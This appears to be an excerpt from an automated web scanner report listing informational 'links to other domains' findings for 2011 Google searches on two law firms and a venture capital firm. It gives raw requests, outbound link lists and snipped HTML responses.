http://webcache.googleusercontent.com/search?q=cache:Xv0xaqxKEPMJ:www.tuckerellis.com/+Tucker+Ellis+%26+West&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:jRGYrKmTBuAJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D20725617+Tucker+Ellis+%26+West&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:zY56DaZYv-oJ:www.superlawyers.com/ohio/lawfirm/Tucker-Ellis-and-West-LLP/a4ab5d8a-4a9c-48b6-bf39-887ab009c5ea.html+Tucker+Ellis+%26+West&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webmail.tuckerellis.com/
http://www.bcgsearch.com/article/60698/TUCKER-ELLIS-WEST/
http://www.bevanlaw.com/
http://www.indeed.com/cmp/Tucker-Ellis-&-West-LLP
http://www.jonesday.com/
http://www.law.com/jsp/article.jsp?id=1202432186287
http://www.lawmarketing.com/pages/articles.asp?Action=Article&ArticleCategoryID=58&ArticleID=911
http://www.linkedin.com/company/tucker-ellis-&-west-llp
http://www.ralaw.com/
http://www.superlawyers.com/ohio/lawfirm/Tucker-Ellis-and-West-LLP/a4ab5d8a-4a9c-48b6-bf39-887ab009c5ea.html
http://www.tuckerellis.com/
http://www.tuckerellis.com/about_us/overview
http://www.tuckerellis.com/careers/careers-at-tew
http://www.tuckerellis.com/files/tucker_ellis__west_congratulates_cox.pdf
http://www.tuckerellis.com/info/employee-access
http://www.tuckerellis.com/info/resources
http://www.ulmer.com/
http://www.youtube.com/results?q=Tucker+Ellis+%26+West&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Tucker+Ellis+%26+West&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 78455

<!doctype html> <head> <title>Tucker Ellis & West - Google Search</title> <script>window.google={kEI:"tNDLTblO4fbSAfGrqcsG",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,2968
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Tucker+Ellis+%26+West&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tuckerellis.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBoQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Xv0xaqxKEPMJ:www.tuckerellis.com/+Tucker+Ellis+%26+West&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Xv0xaqxKEPMJ:www.tuckerellis.com/+Tucker+Ellis+%26+West&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CB8QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.tuckerellis.com/info/employee-access" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoADAA')">Employee Access</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.tuckerellis.com/careers/careers-at-tew" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoATAA')">Careers</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.tuckerellis.com/about_us/overview" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoAjAA')">About Us</a></div><div class=sld><a class=sla href="http://www.tuckerellis.com/info/resources" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoAzAA')">Resources</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tuckerellis.com/files/tucker_ellis__west_congratulates_cox.pdf" class=l onmousedown="return clk(this.href,'','','','3','','0CC8QFjAC')"><em>
...[SNIP]...
<h3 class="r"><a href="http://webmail.tuckerellis.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CDYQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:T70q8OBdvGgJ:webmail.tuckerellis.com/+Tucker+Ellis+%26+West&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:T70q8OBdvGgJ:webmail.tuckerellis.com/+Tucker+Ellis+%26+West&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDsQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawmarketing.com/pages/articles.asp?Action=Article&ArticleCategoryID=58&ArticleID=911" class=l onmousedown="return clk(this.href,'','','','5','','0CD4QFjAE')">Alternative Fees Put <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:TU2ZImEHOe4J:www.lawmarketing.com/pages/articles.asp%3FAction%3DArticle%26ArticleCategoryID%3D58%26ArticleID%3D911+Tucker+Ellis+%26+West&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:TU2ZImEHOe4J:www.lawmarketing.com/pages/articles.asp%3FAction%3DArticle%26ArticleCategoryID%3D58%26ArticleID%3D911+Tucker+Ellis+%26+West&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEMQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/tucker-ellis-&-west-llp" class=l onmousedown="return clk(this.href,'','','','6','','0CEUQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:JQlszfwigsEJ:www.linkedin.com/company/tucker-ellis-%26-west-llp+Tucker+Ellis+%26+West&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:JQlszfwigsEJ:www.linkedin.com/company/tucker-ellis-%26-west-llp+Tucker+Ellis+%26+West&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEoQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/ohio/lawfirm/Tucker-Ellis-and-West-LLP/a4ab5d8a-4a9c-48b6-bf39-887ab009c5ea.html" class=l onmousedown="return clk(this.href,'','','','7','','0CEwQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zY56DaZYv-oJ:www.superlawyers.com/ohio/lawfirm/Tucker-Ellis-and-West-LLP/a4ab5d8a-4a9c-48b6-bf39-887ab009c5ea.html+Tucker+Ellis+%26+West&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:zY56DaZYv-oJ:www.superlawyers.com/ohio/lawfirm/Tucker-Ellis-and-West-LLP/a4ab5d8a-4a9c-48b6-bf39-887ab009c5ea.html+Tucker+Ellis+%26+West&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.law.com/jsp/article.jsp?id=1202432186287" class=l onmousedown="return clk(this.href,'','','','8','','0CFMQFjAH')">Law.com - Billing Options Have Paid Off for <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BUPdSeMGCEoJ:www.law.com/jsp/article.jsp%3Fid%3D1202432186287+Tucker+Ellis+%26+West&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:BUPdSeMGCEoJ:www.law.com/jsp/article.jsp%3Fid%3D1202432186287+Tucker+Ellis+%26+West&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CFgQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.indeed.com/cmp/Tucker-Ellis-%26-West-LLP" class=l onmousedown="return clk('http://www.indeed.com/cmp/Tucker-Ellis-%26-West-LLP','','','','9','','0CFoQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:M7qILs_NU7MJ:www.indeed.com/cmp/Tucker-Ellis-%2526-West-LLP+Tucker+Ellis+%26+West&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:M7qILs_NU7MJ:www.indeed.com/cmp/Tucker-Ellis-%2526-West-LLP+Tucker+Ellis+%26+West&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CF8QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bcgsearch.com/article/60698/TUCKER-ELLIS-WEST/" class=l onmousedown="return clk(this.href,'','','','10','','0CGAQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:33yydL6SYfoJ:www.bcgsearch.com/article/60698/TUCKER-ELLIS-WEST/+Tucker+Ellis+%26+West&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:33yydL6SYfoJ:www.bcgsearch.com/article/60698/TUCKER-ELLIS-WEST/+Tucker+Ellis+%26+West&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGUQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=20725617" class=l onmousedown="return clk(this.href,'','','','11','','0CGYQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jRGYrKmTBuAJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D20725617+Tucker+Ellis+%26+West&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:jRGYrKmTBuAJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D20725617+Tucker+Ellis+%26+West&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CGsQIDAK')">Cached</a>
...[SNIP]...
<div><a href="http://www.ulmer.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CG8QoggwCw')">Ulmer & Berne LLP</a>
...[SNIP]...
<div><a href="http://www.ralaw.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHEQoggwDA')">Roetzel & Andress</a>
...[SNIP]...
<div><a href="http://www.bevanlaw.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHMQoggwDQ')">Bevanlaw.com</a>
...[SNIP]...
<div><a href="http://www.jonesday.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CHUQoggwDg')">Jones Day</a>
...[SNIP]...

19.44. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Stroock+%26+Stroock+%26+Lavan&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://abovethelaw.com/stroock-stroock-lavan/
http://en.wikipedia.org/wiki/Stroock_&_Stroock_&_Lavan
http://webcache.googleusercontent.com/search?q=cache:-mdoIZvhjhkJ:www.stroock.com/sitecontent.cfm%3FcontentID%3D7+Stroock+%26+Stroock+%26+Lavan&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:MlaxS9_1AU8J:www.stroock.com/sitecontent.cfm%3FcontentID%3D35+Stroock+%26+Stroock+%26+Lavan&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:SpEjBGOvYAAJ:www.martindale.com/Stroock-Stroock-Lavan-LLP/506583-law-firm-office.htm+Stroock+%26+Stroock+%26+Lavan&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:TnozukwqCF8J:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DNY3200+Stroock+%26+Stroock+%26+Lavan&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:XaGSFd4KrL4J:abovethelaw.com/stroock-stroock-lavan/+Stroock+%26+Stroock+%26+Lavan&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:evKtmatPMdUJ:en.wikipedia.org/wiki/Stroock_%2526_Stroock_%2526_Lavan+Stroock+%26+Stroock+%26+Lavan&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:igGunZkaFPIJ:www.stroock.com/+Stroock+%26+Stroock+%26+Lavan&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ju4odaUKgvwJ:www.stroock.com/sitecontent.cfm%3FcontentID%3D44+Stroock+%26+Stroock+%26+Lavan&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:uOd9Ua9adRUJ:www.vault.com/wps/portal/usa/companies/company-profile/Stroock-%26-Stroock-%26-Lavan-LLP%3FcompanyId%3D7622+Stroock+%26+Stroock+%26+Lavan&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.hugheshubbard.com/
http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=NY3200
http://www.martindale.com/Stroock-Stroock-Lavan-LLP/506583-law-firm-office.htm
http://www.pbwt.com/
http://www.prnewswire.com/news-releases/new-york-state-comptroller-dinapoli-at-stroock--stroock--lavan-llp-121666293.html
http://www.proskauer.com/
http://www.srz.com/
http://www.stroock.com/
http://www.stroock.com/sitecontent.cfm?contentID=2
http://www.stroock.com/sitecontent.cfm?contentID=29
http://www.stroock.com/sitecontent.cfm?contentID=35
http://www.stroock.com/sitecontent.cfm?contentID=44
http://www.stroock.com/sitecontent.cfm?contentID=5
http://www.stroock.com/sitecontent.cfm?contentID=52
http://www.stroock.com/sitecontent.cfm?contentID=57
http://www.stroock.com/sitecontent.cfm?contentID=63&itemID=8
http://www.stroock.com/sitecontent.cfm?contentID=7
http://www.vault.com/wps/portal/usa/companies/company-profile/Stroock-&-Stroock-&-Lavan-LLP?companyId=7622
http://www.youtube.com/results?q=Stroock+%26+Stroock+%26+Lavan&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Stroock+%26+Stroock+%26+Lavan&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:14 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 77384

<!doctype html> <head> <title>Stroock & Stroock & Lavan - Google Search</title> <script>window.google={kEI:"utDLTffEEILq0gHl8Oj8Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2850
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Stroock+%26+Stroock+%26+Lavan&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.stroock.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CB8QFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:igGunZkaFPIJ:www.stroock.com/+Stroock+%26+Stroock+%26+Lavan&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:igGunZkaFPIJ:www.stroock.com/+Stroock+%26+Stroock+%26+Lavan&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CCQQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=5" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoADAA')">People</a></div><div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=44" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoATAA')">Offices/Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=7" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoAjAA')">Careers</a></div><div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=2" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoAzAA')">About us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=57" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoBDAA')">Publications</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=63&itemID=8" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoBTAA')">Real Estate</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=29" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoBjAA')">Recruiting</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=52" onmousedown="return clk(this.href,'','','','1','','0CC0QqwMoBzAA')">News</a>
...[SNIP]...
<h3 class="r"><a href="http://www.stroock.com/sitecontent.cfm?contentID=44" class=l onmousedown="return clk(this.href,'','','','2','','0CDAQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ju4odaUKgvwJ:www.stroock.com/sitecontent.cfm%3FcontentID%3D44+Stroock+%26+Stroock+%26+Lavan&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ju4odaUKgvwJ:www.stroock.com/sitecontent.cfm%3FcontentID%3D44+Stroock+%26+Stroock+%26+Lavan&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CDcQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.stroock.com/sitecontent.cfm?contentID=7" class=l onmousedown="return clk(this.href,'','','','3','','0CDkQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-mdoIZvhjhkJ:www.stroock.com/sitecontent.cfm%3FcontentID%3D7+Stroock+%26+Stroock+%26+Lavan&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:-mdoIZvhjhkJ:www.stroock.com/sitecontent.cfm%3FcontentID%3D7+Stroock+%26+Stroock+%26+Lavan&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CD4QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.stroock.com/sitecontent.cfm?contentID=35" class=l onmousedown="return clk(this.href,'','','','4','','0CEAQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MlaxS9_1AU8J:www.stroock.com/sitecontent.cfm%3FcontentID%3D35+Stroock+%26+Stroock+%26+Lavan&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:MlaxS9_1AU8J:www.stroock.com/sitecontent.cfm%3FcontentID%3D35+Stroock+%26+Stroock+%26+Lavan&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CEcQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Stroock_%26_Stroock_%26_Lavan" class=l onmousedown="return clk('http://en.wikipedia.org/wiki/Stroock_%26_Stroock_%26_Lavan','','','','5','','0CEoQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:evKtmatPMdUJ:en.wikipedia.org/wiki/Stroock_%2526_Stroock_%2526_Lavan+Stroock+%26+Stroock+%26+Lavan&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:evKtmatPMdUJ:en.wikipedia.org/wiki/Stroock_%2526_Stroock_%2526_Lavan+Stroock+%26+Stroock+%26+Lavan&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CE8QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://abovethelaw.com/stroock-stroock-lavan/" class=l onmousedown="return clk(this.href,'','','','6','','0CFEQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:XaGSFd4KrL4J:abovethelaw.com/stroock-stroock-lavan/+Stroock+%26+Stroock+%26+Lavan&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:XaGSFd4KrL4J:abovethelaw.com/stroock-stroock-lavan/+Stroock+%26+Stroock+%26+Lavan&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CFYQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vault.com/wps/portal/usa/companies/company-profile/Stroock-&-Stroock-&-Lavan-LLP?companyId=7622" class=l onmousedown="return clk(this.href,'','','','7','','0CFgQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uOd9Ua9adRUJ:www.vault.com/wps/portal/usa/companies/company-profile/Stroock-%26-Stroock-%26-Lavan-LLP%3FcompanyId%3D7622+Stroock+%26+Stroock+%26+Lavan&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:uOd9Ua9adRUJ:www.vault.com/wps/portal/usa/companies/company-profile/Stroock-%26-Stroock-%26-Lavan-LLP%3FcompanyId%3D7622+Stroock+%26+Stroock+%26+Lavan&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CF0QIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Stroock-Stroock-Lavan-LLP/506583-law-firm-office.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CF8QFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:SpEjBGOvYAAJ:www.martindale.com/Stroock-Stroock-Lavan-LLP/506583-law-firm-office.htm+Stroock+%26+Stroock+%26+Lavan&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:SpEjBGOvYAAJ:www.martindale.com/Stroock-Stroock-Lavan-LLP/506583-law-firm-office.htm+Stroock+%26+Stroock+%26+Lavan&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CGQQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=NY3200" class=l onmousedown="return clk(this.href,'','','','9','','0CGYQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:TnozukwqCF8J:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DNY3200+Stroock+%26+Stroock+%26+Lavan&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:TnozukwqCF8J:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DNY3200+Stroock+%26+Stroock+%26+Lavan&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGsQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.prnewswire.com/news-releases/new-york-state-comptroller-dinapoli-at-stroock--stroock--lavan-llp-121666293.html" class=l onmousedown="return clk(this.href,'','','','10','','0CG0QFjAJ')">New York State Comptroller DiNapoli at <em>
...[SNIP]...
<div><a href="http://www.srz.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHQQoggwCg')">Schulte Roth & Zabel LLP</a>
...[SNIP]...
<div><a href="http://www.proskauer.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHYQoggwCw')">Proskauer</a>
...[SNIP]...
<div><a href="http://www.hugheshubbard.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHgQoggwDA')">Hughes Hubbard and Reed</a>
...[SNIP]...
<div><a href="http://www.pbwt.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHoQoggwDQ')">Patterson, Belknap, Webb & Tyler LLP</a>
...[SNIP]...

19.45. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Greycroft+Partners&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://angelsoft.net/venture-fund/greycroft-partners
http://boston.citybizlist.com/7/2011/5/5/Venrock-Compromises-Marissa-Campise-from-Greycroft-Partners.aspx
http://dealbook.nytimes.com/tag/greycroft-partners/
http://en.wikipedia.org/wiki/Greycroft_Partners
http://finance.fortune.cnn.com/2011/05/05/why-marissa-campise-left-greycroft-for-venrock/
http://venturebeat.com/company/greycroft-partners/
http://webcache.googleusercontent.com/search?q=cache:0pQsy49O790J:dealbook.nytimes.com/tag/greycroft-partners/+Greycroft+Partners&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:EQrpsqXYsLAJ:www.greycroftpartners.com/team/+Greycroft+Partners&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Ga248CHgYkcJ:www.greycroftpartners.com/portfolio/+Greycroft+Partners&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:IYPI2DJeKdIJ:www.greycroftpartners.com/+Greycroft+Partners&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:SIvtMGHuSKUJ:www.pehub.com/104508/venrock-hires-marissa-campise-from-greycroft-partners/+Greycroft+Partners&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:XDIzLXrrrloJ:boston.citybizlist.com/7/2011/5/5/Venrock-Compromises-Marissa-Campise-from-Greycroft-Partners.aspx+Greycroft+Partners&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:XtckvHYojcAJ:angelsoft.net/venture-fund/greycroft-partners+Greycroft+Partners&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:dM5kWDxYTXwJ:en.wikipedia.org/wiki/Greycroft_Partners+Greycroft+Partners&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
